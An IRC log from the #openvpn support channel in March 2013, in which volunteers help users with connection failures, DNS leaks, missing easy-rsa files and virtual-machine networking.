#openvpn 10:47 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 10:55 -!- JSharpe [~JSharpe@46.165.208.207] has joined #openvpn 11:01 < vaillor> the problem is that i can't ping from server to client 11:01 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Ping timeout: 245 seconds] 11:01 < vaillor> but i can ping from client to server 11:01 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 11:01 < vaillor> no, sorry, i'm wrong 11:02 < vaillor> i can't ping in both directions 11:03 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 11:03 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 11:04 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 11:07 <+EugeneKay> Non-response to pings is a firewall problem. 11:08 <@krzee> vaillor, if you cant ping either direction, you probably are not on the vpn 11:09 < vaillor> krzee, the screen on the icon are yellow 11:09 <@krzee> aka not-connected 11:10 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:10 < vaillor> http://pastebin.com/PSjyd2ii 11:10 < vaillor> this is the log 11:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:16 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:16 <@krzee> should be more log 11:17 <@krzee> and why are you connecting to a machine on your lan? 11:18 <@krzee> and you need log from server 11:18 <@krzee> !logs 11:18 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:18 <@krzee> verb 5 in the configs 11:19 < vaillor> krzee, i'm trying to test it 11:19 < vaillor> and i have only the lan to do it 11:20 < vaillor> http://pastebin.com/LsmJm5ef 11:20 < vaillor> this is the other side 11:21 <@krzee> verb 5 11:21 < vaillor> both client and server? 11:21 <@krzee> !logs 11:21 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:21 <@krzee> whats that say? 11:22 < vaillor> sorry, i'm confusing a all :\ 11:22 <@krzee> just read it 11:26 < vaillor> blank screen on windows log 11:26 < vaillor> Tue Mar 5 18:26:34 2013 us=711029 TCP/UDP: Socket bind failed on local address [undef]: Address already in use 11:26 < vaillor> this is on the client 11:26 < vaillor> WTF 11:26 < vaillor> :\ 11:27 < vaillor> i so difficult to configure a f*****g vpn? with ipsec i did it less 2 mins 11:27 < vaillor> :\ 11:28 < vaillor> with openvpn i'm trying to do it since 4 days 11:29 <+EugeneKay> You have openvpn already running 11:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:30 < vaillor> ctrl+z doesn't kill it? 11:30 <@dazo> wow! 11:30 <@dazo> ctrl-z suspends a process .... 11:30 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:30 <+EugeneKay> -_- 11:31 < vaillor> oh sorry :\ 11:31 < vaillor> so, now is it running 11:32 <@dazo> a suspended process is not running, just waiting to either be brought back to the "foreground" ... or to be allowed to continue to run in the background 11:32 <@dazo> for an openvpn process ... this anyway sounds wrong ... as it should run daemonized 11:32 <@dazo> (--daemon) 11:33 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 11:33 <@krzee> that lil outburst won you a /ig lol 11:34 <@dazo> lol 11:34 < vaillor> now, i try to restart my pc 11:34 < vaillor> brb 11:34 * dazo follows krzee's example 11:35 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [] 11:35 <@krzee> lol 11:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 11:36 <@dazo> "whoops! My suspended processes confuses me! It doesn't work any more! I need to reboot!" ... then you need Unix-101, not openvpn 11:37 <@krzee> ipsec just works when i suspend it! 11:37 <@dazo> lol 11:37 <@krzee> damn you openvpn! 11:37 -!- piele [~Unknown@bakzeil.creativeserver.net] has quit [Ping timeout: 246 seconds] 11:39 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 11:39 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 11:39 <+EugeneKay> This guy's issues are deeper than I thought 11:40 <+EugeneKay> I thought it was simple incompetence at reading iptables-save output, based on the log line he gave. 11:43 < vaillor> http://sprunge.us/IREe 11:43 < vaillor> client side 11:44 <@dazo> EugeneKay: There's always /ig as a rescue ;-) 11:44 < vaillor> http://pastebin.com/f0AC3Gy7 11:44 < vaillor> server side 11:45 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 11:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:50 < vaillor> so? what's the problem? 11:52 -!- vpopov [~happylife@46.251.87.237] has quit [Read error: No route to host] 11:57 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:00 < vaillor> Tue Mar 05 18:42:38 2013 NOTE: failed to obtain options consistency info from peer -- this could occur if the remote peer is running a version of OpenVPN before 1.5-beta8 or if there is a network connectivity problem, and will not necessarily prevent OpenVPN from running (2200 bytes received from peer, 0 bytes authenticated data channel traffic) -- you can disable the options consistency check 12:00 < vaillor> with --disable-occ. 12:06 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has left #openvpn [] 12:07 < DougEFresh> ecrist: 12:07 < DougEFresh> actually 12:07 < DougEFresh> dazo: ping 12:07 < DougEFresh> are you here? 12:07 <@dazo> DougEFresh: pong 12:08 < DougEFresh> dazo: the *.openvpn.net cert has expired 12:08 < DougEFresh> re: forums throws cert error 12:08 < vaillor> dazo, please, can you tell hwhat's wrong in my configuration? 12:08 <@dazo> DougEFresh: that's raidz and/or mattock's responsibility :) 12:08 < DougEFresh> well, perhaps you could cattle prod them for me 12:08 < DougEFresh> :D 12:08 <@dazo> raidz/mattock: ^^^^^ 12:08 < DougEFresh> thank you :D 12:08 * dazo finds the whip :) 12:09 -!- piele [~Unknown@bakzeil.creativeserver.net] has quit [Ping timeout: 276 seconds] 12:09 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 12:10 <@raidz> Hey dazo 12:10 <@dazo> hey! 12:10 < DougEFresh> hello raidz 12:10 * DougEFresh waves 12:10 * DougEFresh posted an announcement for the users for now re: the cert 12:10 <@raidz> Have the cert, need to get it to ecrist or samuli as I don't manage forums server 12:11 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 248 seconds] 12:11 <@dazo> and the game is rolling :) 12:11 < DougEFresh> :D 12:11 < DougEFresh> roll roll roll 12:11 < DougEFresh> raidz: do you manage the openvpn main site? 12:12 <@raidz> yup 12:12 < DougEFresh> may i PM? 12:12 < DougEFresh> :o) 12:13 <@raidz> sure! 12:13 <@raidz> ok, sent cert to samuli/ecrist 12:13 < DougEFresh> thank you 12:13 < vaillor> guys, can you please help me finding errors in my configuration? 12:16 -!- master_of_master [~master_of@p4FF24D0D.dip.t-dialin.net] has joined #openvpn 12:17 -!- master_o1_master [~master_of@p4FF249DB.dip.t-dialin.net] has quit [Read error: Operation timed out] 12:29 -!- dazo is now known as dazo_afk 12:30 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 12:31 -!- Fabius [~Sbratzber@187.110.4.118] has joined #openvpn 12:36 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:46 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"] 13:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 13:01 -!- Devastator- [~devas@177.18.198.56] has joined #openvpn 13:02 -!- Devastator- [~devas@177.18.198.56] has quit [Changing host] 13:02 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 13:05 -!- Devastator- is now known as Devastator 13:18 < vaillor> anybody forgot me :\ 13:22 -!- Fabius [~Sbratzber@187.110.4.118] has quit [Quit: Saindo] 13:24 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [] 13:28 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 13:28 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 13:30 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 13:39 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:49 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 240 seconds] 13:53 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has left #openvpn [] 13:55 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 14:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 14:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:08 -!- Orbi [~opera@109.129.16.115] has joined #openvpn 14:11 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 272 seconds] 14:15 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:15 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:16 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:16 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:19 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 14:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:22 -!- Valcorb is now known as ffdfsdqg 14:22 -!- ffdfsdqg [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:23 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:23 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 255 seconds] 14:30 -!- voidnecron [~voidnecro@freebsd.xs4all.nl] has joined #openvpn 14:30 -!- voidnecron [~voidnecro@freebsd.xs4all.nl] has quit [Changing host] 14:30 -!- voidnecron [~voidnecro@unaffiliated/necron] has joined #openvpn 14:32 -!- necron [~voidnecro@unaffiliated/necron] has quit [Ping timeout: 260 seconds] 14:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 14:39 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 14:46 -!- voidnecron [~voidnecro@unaffiliated/necron] has quit [] 14:47 -!- dazo_afk is now known as dazo 14:59 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 245 seconds] 15:05 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 15:06 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:06 -!- mode/#openvpn [+o krzee] by ChanServ 15:12 -!- mezgani [~mezgani@41.249.95.234] has joined #openvpn 15:14 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 245 seconds] 15:25 -!- mezgani [~mezgani@41.249.95.234] has quit [Quit: Leaving] 15:30 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 15:31 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 15:42 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:46 -!- Orbi [~opera@109.129.16.115] has left #openvpn [] 15:48 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 15:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 15:55 -!- albercuba [~albercuba@p57B336C1.dip.t-dialin.net] has joined #openvpn 15:56 < albercuba> hi there 15:56 < albercuba> need some help setting up openvpn server 15:57 < albercuba> !welcome 15:57 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 15:57 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:04 <@krzee> !ask 16:04 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 16:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn --- Log closed Tue Mar 05 16:25:26 2013 --- Log opened Tue Mar 05 16:31:28 2013 16:31 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 16:31 -!- Irssi: #openvpn: Total of 176 nicks [7 ops, 0 halfops, 4 voices, 165 normal] 16:31 -!- mode/#openvpn [+o ecrist] by ChanServ 16:32 -!- randomA [~athena@pool-108-27-215-51.nycmny.fios.verizon.net] has joined #openvpn 16:32 < randomA> hey 16:32 -!- Irssi: Join to #openvpn was synced in 49 secs 16:32 < randomA> i've a problem with my dns showing up on dnsleaktest.com when connected using openvpn. 16:34 < pekster> Why is that a problem? If you're redirecting traffic, your DNS requests are still resolved according to the defined DNS servers your OS uses 16:36 < pekster> You can push DNS options across the tunnel, although local DHCP has a way of messing with that on renewals, and Windows does strange things with DNS anyway since it keeps per-interface DNS servers, not OS global ones 16:36 < pekster> !pushdns 16:36 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 16:36 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 16:39 < randomA> wait...so if my dns is leaking, i'm still anonymous to the websites i visit 16:40 -!- p3rror [~mezgani@41.249.95.234] has joined #openvpn 16:41 -!- albercuba [~albercuba@p57B336C1.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 16:41 < randomA> but i'm using linux...i know ubuntu has a way to do this. 16:42 * pekster suggests you read item #4 more closely the bot gave you --- Log closed Tue Mar 05 16:44:27 2013 --- Log opened Tue Mar 05 16:57:08 2013 16:57 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 16:57 -!- Irssi: #openvpn: Total of 177 nicks [6 ops, 0 halfops, 4 voices, 167 normal] 16:57 -!- mode/#openvpn [+o ecrist] by ChanServ 16:57 -!- Irssi: Join to #openvpn was synced in 39 secs 16:58 -!- randomA [~athena@pool-108-27-215-51.nycmny.fios.verizon.net] has quit [Quit: Lost terminal] 17:06 -!- Aprogas_ [aprogas@enki.aprogas.net] has joined #openvpn 17:08 -!- Aprogas [aprogas@enki.aprogas.net] has quit [Ping timeout: 256 seconds] 17:25 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 17:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 17:28 -!- mode/#openvpn [+o vpnHelper] by ChanServ 17:39 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:44 -!- dazo is now known as dazo_afk 17:45 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 17:48 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 17:56 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 17:58 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:06 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds] 18:06 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 18:13 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn 18:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:22 -!- fluter_ [~fluter@fedora/fluter] has joined #openvpn 18:23 -!- fluter_ [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 18:31 -!- JSharpe [~JSharpe@46.165.208.207] has quit [Quit: Leaving] 18:42 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:46 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 18:51 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 18:58 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:59 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 19:03 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 19:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 19:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 19:14 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Read error: Connection reset by peer] 19:21 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 19:27 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 255 seconds] 19:34 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 19:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:44 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 19:46 -!- raidz is now known as raidz_away 19:53 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 20:00 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 20:14 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 20:28 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 20:30 -!- mezgani [~mezgani@41.140.180.37] has joined #openvpn 20:33 -!- p3rror [~mezgani@41.249.95.234] has quit [Ping timeout: 245 seconds] 20:37 -!- mezgani [~mezgani@41.140.180.37] has quit [Quit: Leaving] 21:09 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 21:22 -!- kothog [~kothog@unaffiliated/kothog] has quit [Ping timeout: 246 seconds] 21:22 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 21:34 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 21:46 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 22:09 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:20 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 22:31 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:35 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 22:52 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 22:57 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 23:00 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 23:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Write error: Broken pipe] 23:23 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 23:23 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 264 seconds] 23:40 -!- corretico [~luis@190.211.93.38] has joined #openvpn 23:50 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:52 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 23:52 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 23:53 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 23:54 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 23:54 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn --- Day changed Wed Mar 06 2013 00:36 -!- Wulf4 [~Wulf@unaffiliated/wulf] has joined #openvpn 00:40 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds] 01:03 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-lamyntzwqdjvorgy] has quit [Ping timeout: 245 seconds] 01:05 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-obkuahzvfsrfbrdf] has quit [Ping timeout: 245 seconds] 01:07 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-fulzpfazgvsxtjda] has quit [Ping timeout: 245 seconds] 01:26 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 01:39 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:43 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:07 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 02:09 -!- fluter [~fluter@fedora/fluter] has quit [Remote host closed the connection] 02:15 -!- sdx--- [~idnic@70.39.68.36] has joined #openvpn 02:17 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 02:17 -!- idnic [~idnic@114.79.19.23] has joined #openvpn 02:18 -!- sh_t [~sht@NL2.privatevpn.com] has quit [Read error: Connection reset by peer] 02:20 -!- sh_t [~sht@NL2.privatevpn.com] has joined #openvpn 02:20 -!- sdx--- [~idnic@70.39.68.36] has quit [Ping timeout: 276 seconds] 02:28 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-jabwfdwwnubynxqd] has joined #openvpn 02:31 -!- Wulf4 is now known as Wulf 02:53 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 03:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-pgmyjmlyrhmelakt] has joined #openvpn 03:03 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:05 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-txxrmkbetvcozgyg] has joined #openvpn 03:23 -!- sdx--- [~idnic@114.79.17.250] has joined #openvpn 03:26 -!- idnic [~idnic@114.79.19.23] has quit [Ping timeout: 260 seconds] 03:27 -!- sdx--- [~idnic@114.79.17.250] has quit [Client Quit] 03:27 -!- zz_AsadH is now known as AsadH 03:37 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 03:38 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 03:50 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 250 seconds] 04:03 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 04:07 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 04:21 -!- DaveTheDude [~FuckOff@69.85.93.87] has joined #openvpn 04:21 < DaveTheDude> !welcome 04:21 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample 04:21 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 04:22 < DaveTheDude> Hello 04:23 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 04:23 < DaveTheDude> I just tried installing openvpn on a friends vps, typically i have no troubles... but this time i see that the debian 6 repo has been updated to provide 2.3.0 04:24 < DaveTheDude> and i can't find the usual parts to configure openvpn 04:25 < DaveTheDude> was wondering if any of you could tell me where i can find the usual parts? 04:26 < DaveTheDude> i usually just cd into /etc/openvpn/ 04:26 < DaveTheDude> and then cp -R /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn/ 04:28 -!- Aprogas_ is now known as Aprogas 04:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 04:33 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 240 seconds] 04:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:40 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 04:48 < DaveTheDude> does 2.3.0 not ship with easy-rsa or something? 04:51 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 04:51 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 260 seconds] 04:52 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:56 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 04:56 <+EugeneKay> It's been split out in Sid; I don't know about stable 04:57 < DaveTheDude> apparently it has 04:57 <+EugeneKay> I'm not sure where you're getting a 2.3.0 package for stable, as the version on that is 2.1.3 04:58 <+EugeneKay> And testing is only up to 2.2.1 04:58 < DaveTheDude> nah 04:58 <+EugeneKay> That's what packages.debian.org says 04:59 < DaveTheDude> i use openvpn's repos 04:59 <+EugeneKay> I'm not a Debian user myself, so mileage may vary 04:59 < DaveTheDude> https://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 04:59 <@vpnHelper> Title: OpenvpnSoftwareRepos – OpenVPN Community (at community.openvpn.net) 04:59 <+EugeneKay> Ah, OK. I wasn't aware those existed. 04:59 < DaveTheDude> ;D 05:00 < DaveTheDude> well, i compiled 2.3.0 for myself from source, but i was thrown off by no easy-rsa 05:00 < DaveTheDude> now i know why 05:00 <+EugeneKay> I prefer XCA anyway 05:01 <+EugeneKay> You can grab a copy of easy-rsa from here if you want https://github.com/OpenVPN/easy-rsa 05:01 <@vpnHelper> Title: OpenVPN/easy-rsa · GitHub (at github.com) 05:01 <+EugeneKay> It's just wrappers & .cnf for openssl 05:01 < DaveTheDude> yeah i found that a bit ago 05:01 < DaveTheDude> XCA? 05:02 < DaveTheDude> i'm unfamiliar with that 05:02 <+EugeneKay> !xca 05:02 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 05:02 < DaveTheDude> oh 05:02 < DaveTheDude> i pretty much only use cli 05:05 -!- dazo_afk is now known as dazo 05:10 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 05:12 -!- DaveTheDude [~FuckOff@69.85.93.87] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 05:25 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 05:25 < vaillor> hi guys 05:26 < vaillor> what difference is there between privatetunnel.msi and openvpn-install-2.3.0-I004-i686.exe ?? 05:28 <+EugeneKay> You asked this question two days ago 05:38 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 05:38 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:41 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 05:46 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:47 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:47 < vaillor> EugeneKay, yes, and the answer was "the first is proprietary program, the second is open source" 05:47 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:47 <+EugeneKay> What makes you think that you will get a different response today? 05:47 -!- latenite [~latenite@138.77.122.145] has joined #openvpn 05:48 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:49 < vaillor> i need an answer like: the first one allows you to make thes things... the second one allows you to make these other things... so the first or the second is better... 05:49 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:49 < latenite> Hi folks, I have trouble connecting my openvpn server (wich is a virtual machine) to talk to the outside world. The Host and the guest are on different subent and I am clueless how to make them talk to each other. 05:50 < latenite> Can anyone please help me to get this done? 05:50 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:50 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:51 <+EugeneKay> What brand of virtualization 05:51 < latenite> EugeneKay, LXC 05:52 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:52 <+EugeneKay> Never used it, sorry. 05:52 -!- fluter [~fluter@fedora/fluter] has joined 